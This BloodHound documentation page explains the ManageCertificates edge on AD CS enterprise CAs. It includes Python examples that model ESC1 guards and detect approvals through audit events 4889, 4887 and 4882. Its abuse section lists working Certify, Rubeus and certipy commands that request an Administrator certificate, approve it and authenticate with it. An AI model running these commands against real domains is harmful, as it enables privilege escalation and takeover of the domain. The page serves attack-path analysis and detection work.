Applies to BloodHound Enterprise and CE

The ManageCertificates edge represents the Certificate Manager (Issue and Manage Certificates) right on an enterprise CA. This permission allows the principal to approve certificate requests that require manager approval and to modify certain properties of pending requests (e.g., adding extensions to pending certificates). It does not by itself guarantee a privilege escalation, but it often removes a final barrier (manager approval) in ADCS abuse paths.

Abuse Info

An attacker can identify ADCS escalation opportunities where manager approval on a template prevents direct abuse, and then leverage the Certificate Manager role to approve the pending request. Alternatively, the role can be abused to add an extension to pending certificates (e.g., to insert a group-linked issuance policy in environments using Authentication Mechanism Assurance (AMA)). See Certify wiki - Escalation Techniques - ManageCertificates for details.
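The following is an added example (not BloodHound's or Certify's code) that models, in a simplified way, what the paragraph above describes: manager approval is one of several conditions that can block an ESC1-style path, and the Certificate Manager right removes exactly that one condition and none of the others. The field names, the Template and Principal classes and the sample template are this example's own assumptions, not the BloodHound schema or an AD CS API; it is useful for reasoning about which templates actually become reachable once a principal holds this right.

```python
# Added example (not BloodHound's or Certify's code): a simplified model of
# how the Certificate Manager right changes an ESC1-style path. Field names
# are this example's own, not the BloodHound schema or an AD CS API.
from dataclasses import dataclass, field


@dataclass
class Template:
    name: str
    enrollment_principals: set          # principals holding Enroll rights
    enrollee_supplies_subject: bool     # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT set
    auth_eku: bool                      # Client Authentication (or similar) EKU
    manager_approval_required: bool     # CA certificate manager approval
    authorized_signatures_required: int = 0


@dataclass
class Principal:
    name: str
    groups: set = field(default_factory=set)
    manage_certificates_on_ca: bool = False   # holds the ManageCertificates edge


def esc1_guards(template, principal):
    """Conditions that currently stop an ESC1-style enrollment for this
    principal. An empty list means nothing stops it."""
    identities = {principal.name} | principal.groups
    guards = []
    if not (template.enrollment_principals & identities):
        guards.append("no enrollment rights")
    if not template.enrollee_supplies_subject:
        guards.append("enrollee cannot supply subject")
    if not template.auth_eku:
        guards.append("no authentication EKU")
    if template.authorized_signatures_required > 0:
        guards.append("authorized signature required")
    if template.manager_approval_required:
        guards.append("manager approval required")
    return guards


def assess(template, principal):
    """Classify the path. Manager approval is the only guard the Certificate
    Manager right removes; every other guard stays in force."""
    guards = esc1_guards(template, principal)
    if not guards:
        return "exploitable"
    if principal.manage_certificates_on_ca:
        remaining = [g for g in guards if g != "manager approval required"]
        if not remaining:
            return "exploitable via ManageCertificates"
        guards = remaining
    return "blocked: " + ", ".join(guards)


# Constructed sample data (hypothetical template and principals).
CUSTOM_USER = Template("CustomUser", {"CORP\\Domain Users"},
                       enrollee_supplies_subject=True, auth_eku=True,
                       manager_approval_required=True)
NO_AUTH = Template("Encryption", {"CORP\\Domain Users"},
                   enrollee_supplies_subject=True, auth_eku=False,
                   manager_approval_required=True)
JDOE = Principal("CORP\\jdoe", {"CORP\\Domain Users"})
JDOE_CERTMGR = Principal("CORP\\jdoe", {"CORP\\Domain Users"},
                         manage_certificates_on_ca=True)

if __name__ == "__main__":
    for t in (CUSTOM_USER, NO_AUTH):
        for p in (JDOE, JDOE_CERTMGR):
            print(t.name, p.name, p.manage_certificates_on_ca, "->", assess(t, p))
```

Running it shows the point of the edge: CustomUser is blocked only by manager approval for a plain user and becomes reachable once the same user holds the Certificate Manager right, while a template without an authentication EKU stays blocked regardless.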

Windows

Request a certificate that requires manager approval (example ESC1 scenario):
Certify.exe request --ca ca01.corp.local\CORP-CA01-CA --template CustomUser --upn Administrator --sid S-1-5-21-XXXXXXXXX-XXXXXXXXX-XXXXXXXXX-500
Note the printed private key and request ID. Approve the certificate:
Certify.exe manage-ca --ca ca01.corp.local\CORP-CA01-CA --issue-id 1337
Download the issued certificate with the embedded private key (Base64 PFX):
Certify.exe request-download --ca ca01.corp.local\CORP-CA01-CA --id 1337 --private-key <Base64PrivateKey>
Authenticate using the certificate (Rubeus example):
Rubeus.exe asktgt /user:Administrator /certificate:<Base64PFX> /ptt

Linux

Approve a pending request:
certipy ca -ca 'corp-DC-CA' -issue-request 785 -username john@corp.local -password 'Passw0rd'
Retrieve the issued certificate:
certipy req -username john@corp.local -password 'Passw0rd' -ca corp-DC-CA -target ca.corp.local -retrieve 785

Opsec Considerations

Approving requests generates issuance events on the CA and stores the issued certificates in the CA database. Repeated approvals or unusual patterns (e.g., approvals of requests for high-value templates) may be monitored. Added extensions or policy changes may be auditable depending on the CA's audit configuration.
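As an added example of the monitoring this section refers to (not BloodHound's code), the script below correlates Certification Services audit events: a request that was set to pending (event ID 4889) and later approved and issued (4887) was approved by a certificate manager rather than issued automatically, and an issuance whose SAN names a different identity than the requester is the ESC1 pattern. It also lists 4882 events (CA security permissions changed), which is where a grant of the Issue and Manage Certificates right shows up. The events are constructed, simplified dictionaries; real events are EVTX/XML records, and the SAN has to be read from the request or the issued certificate, which this example assumes has already been extracted into the `san_upn` field. The watch list of template names is an assumption.

```python
# Added example (not BloodHound's code): correlate AD CS audit events to
# surface manual approval of pending requests and CA permission changes.
# Events are constructed, simplified dicts; real events are EVTX/XML and
# the SAN must be read from the request or issued certificate beforehand.
WATCHED_TEMPLATES = {"CustomUser", "Administrator", "DomainController"}  # assumed

# Constructed sample events. The IDs are the Windows Security log event IDs
# for Certification Services: 4886 request received, 4889 request set to
# pending, 4887 request approved and certificate issued, 4882 CA security
# permissions changed.
EVENTS = [
    {"event_id": 4889, "request_id": 1337, "requester": "CORP\\jdoe",
     "template": "CustomUser", "san_upn": "Administrator@corp.local"},
    {"event_id": 4887, "request_id": 1337, "requester": "CORP\\jdoe",
     "template": "CustomUser"},
    {"event_id": 4886, "request_id": 1338, "requester": "CORP\\asmith",
     "template": "User"},
    {"event_id": 4887, "request_id": 1338, "requester": "CORP\\asmith",
     "template": "User"},
    {"event_id": 4889, "request_id": 1339, "requester": "CORP\\bbrown",
     "template": "Workstation", "san_upn": None},
    {"event_id": 4887, "request_id": 1339, "requester": "CORP\\bbrown",
     "template": "Workstation"},
    {"event_id": 4882, "subject": "CORP\\itadmin"},
]


def _sam(account):
    """'CORP\\jdoe' -> 'jdoe'"""
    return account.split("\\")[-1].lower()


def find_approved_pending(events, watched_templates=WATCHED_TEMPLATES):
    """Return an alert for every 4887 issuance whose request ID was earlier
    set to pending (4889). Severity is raised when the template is on the
    watch list or the SAN names an identity other than the requester."""
    pending = {e["request_id"]: e for e in events if e["event_id"] == 4889}
    alerts = []
    for e in events:
        if e["event_id"] != 4887 or e["request_id"] not in pending:
            continue
        req = pending[e["request_id"]]
        san = req.get("san_upn")
        mismatch = bool(san) and san.split("@")[0].lower() != _sam(req["requester"])
        high = mismatch or req["template"] in watched_templates
        alerts.append({
            "request_id": e["request_id"],
            "requester": req["requester"],
            "template": req["template"],
            "san_mismatch": mismatch,
            "severity": "high" if high else "medium",
        })
    return alerts


def find_ca_permission_changes(events):
    """4882 fires when the CA's security permissions change, i.e. when the
    Issue and Manage Certificates right is granted or removed. Each hit is
    worth reviewing against the expected holders of this edge."""
    return [e for e in events if e["event_id"] == 4882]


if __name__ == "__main__":
    for a in find_approved_pending(EVENTS):
        print(a)
    for c in find_ca_permission_changes(EVENTS):
        print("CA security permissions changed by", c["subject"])
```

These events are only written when the CA's audit filter includes "Issue and manage certificate requests" and "Change CA security settings" and the Object Access / Certification Services audit subcategory is enabled on the CA host; without that, approvals leave only the CA database record of the issued certificate.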

Edge Schema

Source: User, Group, Computer
Destination: EnterpriseCA
Traversable: Yes

References

This edge is related to the following MITRE ATT&CK tactic and techniques:

Abuse and Opsec references